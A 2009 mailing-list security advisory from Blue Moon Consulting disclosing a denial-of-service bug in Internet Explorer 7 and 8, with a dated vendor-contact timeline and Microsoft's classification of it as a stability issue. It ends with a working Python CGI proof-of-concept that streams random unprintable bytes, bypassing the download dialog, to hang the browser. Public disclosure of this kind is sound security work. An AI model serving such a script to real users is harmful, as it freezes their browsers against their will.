<<< Date Index >>>     <<< Thread Index >>>

[BMSA 2009-04] Remote DoS in Internet Explorer



BLUE MOON SECURITY ADVISORY 2009-04
===================================


:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
-----------

We could not find out the definitive description for Internet Explorer from 
Microsoft website. This is our own understanding of the application: Internet 
Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. 
When visit a malicious page, the browser may freeze indefinitely and killing it 
in Task Manager is required. With IE8's default settings, killing the tab 
process simply launches another process and goes to the same malicious page, 
hence repeating the cycle. The root cause is unknown to us. We suspect that it 
is related to the display of unprintable characters on Windows XP, and Vista. 
The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue 
and will be addressing it in the next version of the application.

Workaround
----------

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 
<http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  March 19, 2009: Initial contact sent to secure@xxxxxxxxxxxxxx

:Vendor response:

  March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

  March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME 
format.

  March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and 
informed us of a new case manager, Jack.

  March 21, 2009: We further reported that IE 8 was affected by the same bug, 
in PGP MIME format.

  March 30, 2009: We asked if Microsoft had received our PoC.

  March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could 
not reproduce the behavior of this bug.

  April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista 
Business. Sent in PGP MIME format.

  April 01, 2009: Jack said the email was stripped out and asked us to resend.

  April 02, 2009: We resent the last email in plain text.

  April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in 
no case did Internet Explorer hang indefinitely.

  April 06, 2009: We sent Jack a video clip, in PGP MIME format.

  April 06, 2009: Jack asked us to resend because the email was stripped again.

  April 07, 2009: We resent the clip in plain text to Jack.

  April 09, 2009: Jack acknowledged the receipt and let us know the bug would 
be fixed in the next version of Internet Explorer.

  April 09, 2009: We asked for a confirmation of bug classification.

  April 09, 2009: Jack confirmed this bug was classified as stability, instead 
of a security issue. We therefore decided to release this advisory to the 
public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

  #!C:/python25/python
  import sys
  import random
  
  CHAR_SET = [chr(x) for x in range(0x20)]
  CHAR_SET += [chr(x) for x in range(128, 256)]
  
  def send_file():
        l = 800000 + 4096
        print "Content-Type: text/plain"
        print "Content-Length: %d" % l
        print "Cache-Control: no-cache, no-store, must-revalidate"
        # this is not standardized, but use it anyway
        print "Pragma: no-cache"
        print ""
        # bypass IE download dialog
        sys.stdout.write("a" * 4096)
        # print junks
        for i in xrange(l):
                sys.stdout.write(random.choice(CHAR_SET))
        sys.exit()

  send_file()


Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty 
of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either 
express or implied, including the warranties of merchantability and fitness for 
a particular purpose. Your use of the information on the advisory or materials 
linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd 
reserves the right to change or update this notice at any time.

Cheers
-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn